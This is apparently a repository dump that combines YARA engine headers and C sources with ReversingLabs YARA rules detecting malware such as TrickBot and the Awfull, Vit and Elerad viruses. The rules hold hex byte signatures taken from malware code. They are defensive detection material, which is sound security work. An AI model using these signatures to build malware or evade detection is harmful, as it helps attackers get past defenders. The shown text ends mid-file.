├── src ├── lib │ ├── stino.settings │ ├── modules │ │ ├── pb_tests │ │ │ ├── yara.pb-c.h │ │ │ └── pb_tests.proto │ │ ├── module_list │ │ ├── pb_to_module.rst │ │ ├── pe │ │ │ └── authenticode-parser │ │ │ │ ├── certificate.h │ │ │ │ ├── countersignature.h │ │ │ │ ├── helper.h │ │ │ │ ├── helper.c │ │ │ │ ├── structs.c │ │ │ │ └── structs.h │ │ ├── demo │ │ │ └── demo.c │ │ └── time │ │ │ └── time.c │ ├── include │ │ ├── yara │ │ │ ├── notebook.h │ │ │ ├── simple_str.h │ │ │ ├── elf_utils.h │ │ │ ├── exefiles.h │ │ │ ├── base64.h │ │ │ ├── scan.h │ │ │ ├── mem.h │ │ │ ├── stream.h │ │ │ ├── proc.h │ │ │ ├── stack.h │ │ │ ├── pe_utils.h │ │ │ ├── threading.h │ │ │ ├── stopwatch.h │ │ │ ├── filemap.h │ │ │ ├── ahocorasick.h │ │ │ ├── sizedstr.h │ │ │ ├── endian.h │ │ │ ├── unaligned.h │ │ │ ├── strutils.h │ │ │ ├── dex.h │ │ │ ├── integers.h │ │ │ ├── scanner.h │ │ │ └── bitmask.h │ │ ├── yara.h │ │ └── tlshc │ │ │ └── tlsh.h │ ├── tlshc │ │ ├── tlsh_util.h │ │ ├── tlsh.c │ │ └── tlsh_impl.h │ ├── pb │ │ └── yara.proto │ ├── stream.c │ ├── endian.c │ ├── proc │ │ └── none.c │ ├── hex_grammar.h │ └── simple_str.c └── exp │ ├── virus │ ├── Win32.Virus.Awfull.yara │ ├── Linux.Virus.Vit.yara │ ├── Win32.Virus.Elerad.yara │ └── Win32.Virus.Greenp.yara │ ├── trojan │ ├── Win32.Trojan.TrickBot.yara │ ├── Win32.Trojan.HermeticWiper.yara │ ├── Linux.Trojan.AcidRain.yara │ └── Win32.Trojan.Dridex.yara │ ├── ransomware │ ├── Win32.Ransomware.Archiveus.yara │ ├── Win32.Ransomware.Petya.yara │ ├── Win32.Ransomware.Flamingo.yara │ ├── Win32.Ransomware.Gpcode.yara │ ├── ByteCode.MSIL.Ransomware.Ghostbin.yara │ ├── Win32.Ransomware.Crypmic.yara │ ├── ByteCode.MSIL.Ransomware.TimeCrypt.yara │ ├── ByteCode.MSIL.Ransomware.GhosTEncryptor.yara │ ├── Bytecode.MSIL.Ransomware.CobraLocker.yara │ ├── ByteCode.MSIL.Ransomware.Povlsomware.yara │ ├── Win32.Ransomware.ChiChi.yara │ ├── ByteCode.MSIL.Ransomware.Invert.yara │ ├── Win32.Ransomware.Acepy.yara │ ├── ByteCode.MSIL.Ransomware.Hog.yara │ ├── ByteCode.MSIL.Ransomware.WormLocker.yara │ ├── ByteCode.MSIL.Ransomware.McBurglar.yara │ ├── Win32.Ransomware.NB65.yara │ ├── ByteCode.MSIL.Ransomware.Venom.yara │ ├── Win32.Ransomware.MRAC.yara │ ├── ByteCode.MSIL.Ransomware.Oct.yara │ ├── ByteCode.MSIL.Ransomware.Khonsari.yara │ ├── ByteCode.MSIL.Ransomware.Cring.yara │ ├── ByteCode.MSIL.Ransomware.Eternity.yara │ └── ByteCode.MSIL.Ransomware.TimeTime.yara │ └── infostealer │ └── Win32.Infostealer.StealC.yara ├── license └── LICENSE ├── README.md └── tests ├── maldev.py └── malware.py /src/lib/stino.settings: -------------------------------------------------------------------------------- 1 | { 2 | "baudrate": 4, 3 | "line_ending": 1, 4 | "serial_port": 1 5 | } -------------------------------------------------------------------------------- /src/lib/modules/pb_tests/yara.pb-c.h: -------------------------------------------------------------------------------- 1 | 2 | /* 3 | * Empty header file generated by protoc-gen-yara because it is included from 4 | * .pb-c.h files generated by protoc-gen-c. 5 | */ 6 | -------------------------------------------------------------------------------- /src/lib/include/yara/notebook.h: -------------------------------------------------------------------------------- 1 | // 2 | // Created by Victor Manuel Alvarez on 3/4/20. 3 | // 4 | 5 | #ifndef YR_NOTEBOOK_H 6 | #define YR_NOTEBOOK_H 7 | 8 | #include 9 | 10 | typedef struct YR_NOTEBOOK YR_NOTEBOOK; 11 | 12 | int yr_notebook_create(size_t page_size, YR_NOTEBOOK** pool); 13 | 14 | int yr_notebook_destroy(YR_NOTEBOOK* pool); 15 | 16 | void* yr_notebook_alloc(YR_NOTEBOOK* notebook, size_t size); 17 | 18 | #endif // YR_NOTEBOOK_H 19 | -------------------------------------------------------------------------------- /src/lib/modules/module_list: -------------------------------------------------------------------------------- 1 | MODULE(tests) 2 | MODULE(pe) 3 | MODULE(elf) 4 | MODULE(math) 5 | MODULE(time) 6 | MODULE(console) 7 | MODULE(string) 8 | 9 | #ifdef DOTNET_MODULE 10 | MODULE(dotnet) 11 | #endif 12 | 13 | #ifdef CUCKOO_MODULE 14 | MODULE(cuckoo) 15 | #endif 16 | 17 | #ifdef MAGIC_MODULE 18 | MODULE(magic) 19 | #endif 20 | 21 | #ifdef HASH_MODULE 22 | MODULE(hash) 23 | #endif 24 | 25 | #ifdef MACHO_MODULE 26 | MODULE(macho) 27 | #endif 28 | 29 | #ifdef DEX_MODULE 30 | MODULE(dex) 31 | #endif 32 | 33 | #ifdef PB_TESTS_MODULE 34 | MODULE(pb_tests) 35 | #endif 36 | -------------------------------------------------------------------------------- /src/lib/include/yara/simple_str.h: -------------------------------------------------------------------------------- 1 | #ifndef _SIMPLESTR_H 2 | #define _SIMPLESTR_H 3 | 4 | #include 5 | 6 | /* Simple dynamic string implementation for more readable/maintainable code 7 | Can be further optimized */ 8 | typedef struct _SIMPLE_STR 9 | { 10 | uint32_t len; 11 | uint32_t cap; 12 | char* str; 13 | } SIMPLE_STR, *PSIMPLE_STR; 14 | 15 | SIMPLE_STR* sstr_new(const char* s); 16 | SIMPLE_STR* sstr_newf(const char* fmt, ...); 17 | void sstr_free(SIMPLE_STR* ss); 18 | bool sstr_appendf(SIMPLE_STR* ss, const char* fmt, ...); 19 | char* sstr_move(SIMPLE_STR* ss); 20 | 21 | #endif -------------------------------------------------------------------------------- /src/lib/include/yara/elf_utils.h: -------------------------------------------------------------------------------- 1 | #ifndef YR_ELF_UTILS_H 2 | #define YR_ELF_UTILS_H 3 | 4 | #include 5 | 6 | typedef struct _ELF_SYMBOL 7 | { 8 | char *name; 9 | int value; 10 | int size; 11 | int type; 12 | int bind; 13 | int shndx; 14 | int visibility; 15 | 16 | struct _ELF_SYMBOL *next; // Next symbol in the list 17 | } ELF_SYMBOL; 18 | 19 | // Linked list of symbols 20 | typedef struct _ELF_SYMBOL_LIST 21 | { 22 | int count; 23 | ELF_SYMBOL *symbols; 24 | } ELF_SYMBOL_LIST; 25 | 26 | typedef struct _ELF 27 | { 28 | ELF_SYMBOL_LIST *symtab; 29 | ELF_SYMBOL_LIST *dynsym; 30 | char *telfhash; 31 | char *import_hash; 32 | } ELF; 33 | 34 | #endif //YR_ELF_UTILS_H 35 | -------------------------------------------------------------------------------- /src/lib/tlshc/tlsh_util.h: -------------------------------------------------------------------------------- 1 | #ifndef __TLSH_TLSH_UTIL_H__ 2 | #define __TLSH_TLSH_UTIL_H__ 3 | 4 | #ifdef __cplusplus 5 | extern "C" 6 | { 7 | #endif 8 | 9 | // unsigned char b_mapping(unsigned char salt, unsigned char i, unsigned char 10 | // j, unsigned char k); 11 | unsigned char l_capturing(unsigned int len); 12 | int mod_diff(unsigned int x, unsigned int y, unsigned int R); 13 | int h_distance(int len, const unsigned char x[], const unsigned char y[]); 14 | void to_hex(unsigned char* psrc, int len, char* pdest); 15 | void from_hex(const char* psrc, int len, unsigned char* pdest); 16 | unsigned char swap_byte(const unsigned char in); 17 | 18 | #ifdef __cplusplus 19 | } 20 | #endif 21 | 22 | #endif // __TLSH_TLSH_UTIL_H__ -------------------------------------------------------------------------------- /src/lib/pb/yara.proto: -------------------------------------------------------------------------------- 1 | syntax = "proto3"; 2 | 3 | package yara; 4 | 5 | import "google/protobuf/descriptor.proto"; 6 | 7 | message ModuleOptions { 8 | string name = 1; 9 | string root_message = 2; 10 | } 11 | 12 | message FieldOptions { 13 | string name = 1; 14 | bool ignore = 2; 15 | } 16 | 17 | message MessageOptions { 18 | string name = 1; 19 | } 20 | 21 | message EnumOptions { 22 | string name = 1; 23 | } 24 | 25 | extend google.protobuf.FileOptions { 26 | ModuleOptions module_options = 51503; 27 | } 28 | 29 | extend google.protobuf.FieldOptions { 30 | FieldOptions field_options = 51504; 31 | } 32 | 33 | extend google.protobuf.MessageOptions { 34 | MessageOptions message_options = 51505; 35 | } 36 | 37 | extend google.protobuf.EnumOptions { 38 | EnumOptions enum_options = 51506; 39 | } 40 | -------------------------------------------------------------------------------- /src/lib/modules/pb_to_module.rst: -------------------------------------------------------------------------------- 1 | Generating a module from a Protocol Buffer 2 | 3 | 4 | [Protocol Buffers](https://developers.google.com/protocol-buffers) (protobufs) 5 | are Google's language-neutral, platform-idependent mechanism for serializing 6 | structured data. The first thing you need to do for using protobuf is defining 7 | your data structures, for example: 8 | 9 | message Employee { 10 | int32 id = 1; 11 | string name = 2; 12 | int32 age = 3 13 | string email = 4; 14 | } 15 | 16 | Once you have defined your data structure, you use a protobuf compiler to 17 | automatically generate the code that will marshal/unmarshall the data structure 18 | into/from a bytes sequence. The protobuf compiler is able to generate code in 19 | multiple languages, including C/C++, Python, Java and Go. 20 | 21 | Now imagine that you can pass the marshalled data structure to YARA, and create 22 | rules based in that data. Like for example: 23 | 24 | import "vt_employee" 25 | 26 | rule virustotal_employee_under_25 27 | { 28 | condition: 29 | vt_employee.age < 25 and 30 | vt_employee.email matches /*.@virustotal\.com/ 31 | } 32 | 33 | Neat, right? 34 | -------------------------------------------------------------------------------- /license/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2020 - 2024 ReversingLabs - all contributors 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of 4 | this software and associated documentation files (the "Software"), to deal in 5 | the Software without restriction, including without limitation the rights to 6 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 7 | of the Software, and to permit persons to whom the Software is furnished to do 8 | so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in all 11 | copies or substantial portions of the Software. 12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 19 | SOFTWARE. 20 | -------------------------------------------------------------------------------- /src/exp/virus/Win32.Virus.Awfull.yara: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule Win32_Virus_Awfull : tc_detection malicious 4 | { 5 | meta: 6 | 7 | author = "ReversingLabs" 8 | 9 | source = "ReversingLabs" 10 | status = "RELEASED" 11 | sharing = "TLP:WHITE" 12 | category = "MALWARE" 13 | malware = "AWFULL" 14 | description = "Yara rule that detects Awfull virus." 15 | 16 | tc_detection_type = "Virus" 17 | tc_detection_name = "Awfull" 18 | tc_detection_factor = 5 19 | 20 | strings: 21 | $awfull_body = { 22 | 60 E8 ?? 00 00 00 8B 64 24 08 EB ?? [0-256] 23 | 33 D2 64 FF 32 64 89 22 33 C0 C7 00 00 00 00 00 33 D2 64 8F 02 24 | 5A 64 (8B 0D | 67 8B 0E ) 14 00 [0-2] E3 03 FA 25 | EB FD 61 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 0B ED 74 ?? 26 | [0-128] (BE | 8B 35) ?? ?? ?? ?? 03 F5 B9 ?? ?? ?? ?? 27 | 56 5F AC F6 D0 AA 49 E3 02 EB F7 28 | } 29 | 30 | condition: 31 | uint16(0) == 0x5A4D and 32 | ($awfull_body at pe.entry_point) 33 | } -------------------------------------------------------------------------------- /src/exp/virus/Linux.Virus.Vit.yara: -------------------------------------------------------------------------------- 1 | import "elf" 2 | 3 | rule Linux_Virus_Vit : tc_detection malicious 4 | { 5 | meta: 6 | 7 | author = "ReversingLabs" 8 | 9 | source = "ReversingLabs" 10 | status = "RELEASED" 11 | sharing = "TLP:WHITE" 12 | category = "MALWARE" 13 | malware = "VIT" 14 | description = "Yara rule that detects Vit virus." 15 | 16 | tc_detection_type = "Virus" 17 | tc_detection_name = "Vit" 18 | tc_detection_factor = 5 19 | 20 | strings: 21 | 22 | $vit_entry_point = { 23 | 55 89 E5 81 EC 40 31 00 00 57 56 50 53 51 52 C7 85 D8 CE FF FF 00 00 00 00 C7 85 D4 24 | CE FF FF 00 00 00 00 C7 85 FC CF FF FF CA 08 00 00 C7 85 F8 CF FF FF B8 06 00 00 C7 25 | 85 F4 CF FF FF AD 08 00 00 C7 85 F0 CF FF FF 50 06 00 00 6A 00 6A 00 8B 45 08 50 E8 26 | 18 FA FF FF 89 C6 83 C4 0C 85 F6 0F 8C E6 01 00 00 6A 00 68 ?? ?? ?? ?? 56 E8 2E FA 27 | FF FF 83 C4 0C 85 C0 0F 8C C4 01 00 00 8B 85 FC CF FF FF 50 8D 85 00 D0 FF FF 50 56 28 | E8 2A FA FF FF 89 C2 8B 85 FC CF FF FF 83 C4 0C 39 C2 0F 85 9D 01 00 00 56 E8 E1 F9 29 | FF FF BE FF FF FF FF 6A 00 6A 00 E9 30 | } 31 | 32 | $vit_str = "vi324.tmp" 33 | 34 | condition: 35 | uint32(0) == 0x464C457F and $vit_entry_point at elf.entry_point and $vit_str 36 | } -------------------------------------------------------------------------------- /src/exp/virus/Win32.Virus.Elerad.yara: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule Win32_Virus_Elerad : tc_detection malicious 4 | { 5 | meta: 6 | 7 | author = "ReversingLabs" 8 | 9 | source = "ReversingLabs" 10 | status = "RELEASED" 11 | sharing = "TLP:WHITE" 12 | category = "MALWARE" 13 | malware = "ELERAD" 14 | description = "Yara rule that detects Elerad virus." 15 | 16 | tc_detection_type = "Virus" 17 | tc_detection_name = "Elerad" 18 | tc_detection_factor = 5 19 | 20 | strings: 21 | $elerad_body = { 22 | EB 77 60 E8 09 00 00 00 8B 64 24 08 E9 DD 01 00 00 33 D2 64 FF 32 64 89 22 50 8B D8 B9 FF 00 00 00 81 38 2E 65 78 65 74 23 | 08 40 E2 F5 E9 BD 01 00 00 32 D2 38 50 04 0F 85 B2 01 00 00 33 D2 80 38 5C 74 07 3B C3 74 07 48 E2 F4 88 10 8B D0 58 BE 24 | 00 00 E6 77 BF 23 C1 AB 00 EB 3E 60 E8 09 00 00 00 8B 64 24 08 E9 84 01 00 00 33 D2 64 FF 32 64 89 22 BE 00 00 E6 77 EB 25 | 20 68 ?? ?? ?? ?? 60 8B 74 24 24 E8 09 00 00 00 8B 64 24 08 E9 5D 01 00 00 33 D2 64 FF 32 64 89 22 E8 00 00 00 00 5D 81 26 | ED ?? ?? ?? ?? 81 FF 23 C1 AB 00 75 0C 89 95 22 12 40 00 89 85 1E 12 40 00 BA ?? ?? ?? ?? B9 09 02 00 00 8D 85 D0 10 40 27 | 00 31 10 83 C0 04 E2 F9 28 | } 29 | 30 | condition: 31 | uint16(0) == 0x5A4D and 32 | ($elerad_body at pe.entry_point) 33 | } -------------------------------------------------------------------------------- /src/lib/tlshc/tlsh.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "tlsh_impl.h" 4 | 5 | Tlsh* tlsh_new() 6 | { 7 | Tlsh* tlsh = malloc(sizeof(Tlsh)); 8 | if (!tlsh) 9 | return NULL; 10 | 11 | tlsh->impl = tlsh_impl_new(); 12 | if (!tlsh->impl) 13 | { 14 | free(tlsh); 15 | return NULL; 16 | } 17 | 18 | return tlsh; 19 | } 20 | 21 | void tlsh_free(Tlsh* tlsh) 22 | { 23 | if (tlsh) 24 | { 25 | tlsh_impl_free(tlsh->impl); 26 | free(tlsh); 27 | } 28 | } 29 | 30 | int tlsh_update(Tlsh* tlsh, const unsigned char* data, unsigned int len) 31 | { 32 | int tlsh_option = 0; 33 | if (tlsh->impl) 34 | { 35 | int res = tlsh_impl_update(tlsh->impl, data, len, tlsh_option); 36 | if (res) 37 | { 38 | return 1; 39 | } 40 | } 41 | 42 | return 0; 43 | } 44 | 45 | void tlsh_reset(Tlsh* tlsh) 46 | { 47 | if (tlsh->impl) 48 | tlsh_impl_reset(tlsh->impl); 49 | } 50 | 51 | int tlsh_final( 52 | Tlsh* tlsh, 53 | const unsigned char* data, 54 | unsigned int len, 55 | int tlsh_option) 56 | { 57 | if (tlsh->impl) 58 | { 59 | if ((data != NULL) && (len > 0)) 60 | { 61 | int res = tlsh_impl_update(tlsh->impl, data, len, tlsh_option); 62 | if (res) 63 | { 64 | return 1; 65 | } 66 | } 67 | 68 | tlsh_impl_final(tlsh->impl, tlsh_option); 69 | } 70 | 71 | return 0; 72 | } 73 | 74 | const char* tlsh_get_hash(Tlsh* tlsh, bool showvers) 75 | { 76 | if (tlsh->impl) 77 | return tlsh_impl_hash(tlsh->impl, showvers); 78 | else 79 | return ""; 80 | } -------------------------------------------------------------------------------- /src/lib/include/yara/exefiles.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2007. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_EXEFILES_H 31 | #define YR_EXEFILES_H 32 | 33 | uint64_t yr_get_entry_point_offset(const uint8_t* buffer, size_t buffer_length); 34 | 35 | uint64_t yr_get_entry_point_address( 36 | const uint8_t* buffer, 37 | size_t buffer_length, 38 | uint64_t base_address); 39 | 40 | #endif 41 | -------------------------------------------------------------------------------- /src/exp/trojan/Win32.Trojan.TrickBot.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Trojan_TrickBot : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "TRICKBOT" 12 | description = "Yara rule that detects TrickBot trojan." 13 | 14 | tc_detection_type = "Trojan" 15 | tc_detection_name = "TrickBot" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $entry_setup = { 21 | 58 (68 | 8B) [6-8] 59 [1-3] E2 ?? 57 8B (C7 | EC) 8B (C7 | EC) 05 ?? ?? ?? ?? 68 [4-5] 22 | 89 45 [1-2] 8B D7 [3-4] 8B C1 66 AD 85 C0 74 ?? 3B (C1 | C8) (72 | 77) ?? 2B C1 (C1 | D1) 23 | [2-4] 8B CF 03 C8 81 C1 ?? ?? ?? ?? 8B 01 59 03 D0 52 EB ?? 89 45 ?? 8B C5 B9 ?? ?? 24 | ?? ?? C1 E1 ?? 2B C1 8B 00 89 45 ?? 6A ?? 8B D0 59 FF D2 89 68 ?? 6A ?? 8B D0 FF D2 25 | } 26 | 27 | $decrypt_function_snippet = { 28 | 58 8B C8 75 ?? 58 2B F0 50 8B D8 49 75 ?? 59 58 59 5E 5F 5B C3 29 | } 30 | 31 | $decrypt_function_snippet_wrapper = { 32 | 55 BD ?? ?? ?? ?? 50 51 52 6A ?? FF 45 ?? 8B 45 ?? 59 F7 E1 8D 8D ?? ?? ?? ?? 03 C8 33 | 89 4D ?? 8F 41 ?? 8F 41 ?? 8F 41 ?? 8F 41 ?? 8F 01 89 79 ?? 89 71 ?? 8B D1 59 89 4A 34 | ?? 55 2B C0 8B C8 8B 02 8B F8 58 41 41 41 41 50 2B C1 8B 00 3B C7 72 ?? 58 C1 E9 ?? 35 | 49 89 4A ?? E3 ?? FF 55 ?? 8B 55 ?? 8B 4A ?? FF 55 ?? 50 51 50 6A ?? 59 FF 55 ?? FF 36 | D0 37 | } 38 | 39 | condition: 40 | uint16(0) == 0x5A4D and 41 | $entry_setup and 42 | ( 43 | $decrypt_function_snippet or 44 | $decrypt_function_snippet_wrapper 45 | ) 46 | } -------------------------------------------------------------------------------- /src/lib/modules/pb_tests/pb_tests.proto: -------------------------------------------------------------------------------- 1 | 2 | syntax = "proto2"; 3 | 4 | package test; 5 | import "yara.proto"; 6 | 7 | option (yara.module_options) = { 8 | name : "pb_tests" 9 | root_message: "RootMessage"; 10 | }; 11 | 12 | 13 | message Struct { 14 | option (yara.message_options).name = "struct"; 15 | required string f_string = 1; 16 | enum Enum { 17 | option (yara.enum_options).name = "enum"; 18 | FIRST = 0; 19 | SECOND = 1; 20 | } 21 | optional Enum f_enum = 2; 22 | message NestedStruct { 23 | optional int32 f_int32 = 1; 24 | optional string f_string = 2; 25 | } 26 | optional NestedStruct f_nested_struct = 3; 27 | repeated NestedStruct f_nested_struct_array = 4; 28 | } 29 | 30 | message MapStruct { 31 | optional int32 f_int32 = 1; 32 | optional int64 f_int64 = 2; 33 | } 34 | 35 | message RootMessage { 36 | optional int32 f_int32 = 1; 37 | optional int64 f_int64 = 2; 38 | //optional uint32 f_uint32 = 3; // not supported 39 | //optional uint64 f_uint64 = 4; // not supported 40 | optional sint32 f_sint32 = 5; 41 | optional sint64 f_sint64 = 6; 42 | //optional fixed32 f_fixed32 = 7; // not supported 43 | //optional fixed64 f_fixed64 = 8; // not supported 44 | optional sfixed32 f_sfixed32 = 9; 45 | optional sfixed64 f_sfixed64 = 10; 46 | optional bool f_bool = 11; 47 | optional string f_string = 12; 48 | optional bytes f_bytes = 13; 49 | repeated Struct f_struct_array = 14; 50 | map f_map_int32 = 15; 51 | map f_map_bool = 16; 52 | map f_map_string = 17; 53 | map f_map_float = 18; 54 | map f_map_struct = 19; 55 | oneof f_oneof { 56 | string f_oneof_string = 20; 57 | MapStruct f_oneof_struct = 21; 58 | } 59 | optional string f_ignored = 22 [(yara.field_options).ignore = true]; 60 | optional string f_renamed = 23 [(yara.field_options).name = "f_yara_name"]; 61 | } 62 | -------------------------------------------------------------------------------- /src/lib/include/yara.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2007-2013. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_YARA_H 31 | #define YR_YARA_H 32 | 33 | #include "yara/compiler.h" 34 | #include "yara/error.h" 35 | #include "yara/filemap.h" 36 | #include "yara/hash.h" 37 | #include "yara/libyara.h" 38 | #include "yara/mem.h" 39 | #include "yara/modules.h" 40 | #include "yara/object.h" 41 | #include "yara/scanner.h" 42 | #include "yara/stream.h" 43 | #include "yara/strutils.h" 44 | #include "yara/utils.h" 45 | 46 | #endif 47 | -------------------------------------------------------------------------------- /src/lib/include/yara/base64.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2020. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_BASE64_H 31 | #define YR_BASE64_H 32 | 33 | #include 34 | #include 35 | #include 36 | 37 | typedef struct BASE64_NODE BASE64_NODE; 38 | 39 | struct BASE64_NODE 40 | { 41 | SIZED_STRING* str; 42 | int escaped; 43 | BASE64_NODE* next; 44 | }; 45 | 46 | int yr_base64_ast_from_string( 47 | SIZED_STRING* in_str, 48 | YR_MODIFIER modifier, 49 | RE_AST** re_ast, 50 | RE_ERROR* error); 51 | #endif 52 | -------------------------------------------------------------------------------- /src/lib/modules/pe/authenticode-parser/certificate.h: -------------------------------------------------------------------------------- 1 | /* Copyright (c) 2021 Avast Software 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of 4 | this software and associated documentation files (the "Software"), to deal 5 | in the Software without restriction, including without limitation the rights to 6 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 7 | of the Software, and to permit persons to whom the Software is furnished to do 8 | so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in all 11 | copies or substantial portions of the Software. 12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 19 | SOFTWARE. 20 | */ 21 | 22 | #ifndef AUTHENTICODE_PARSER_CERTIFICATE_H 23 | #define AUTHENTICODE_PARSER_CERTIFICATE_H 24 | 25 | #include 26 | 27 | #include 28 | 29 | #ifdef __cplusplus 30 | extern "C" { 31 | #endif 32 | 33 | Certificate* certificate_new(X509* x509); 34 | Certificate* certificate_copy(Certificate* cert); 35 | void certificate_free(Certificate* cert); 36 | 37 | void parse_x509_certificates(const STACK_OF(X509) * 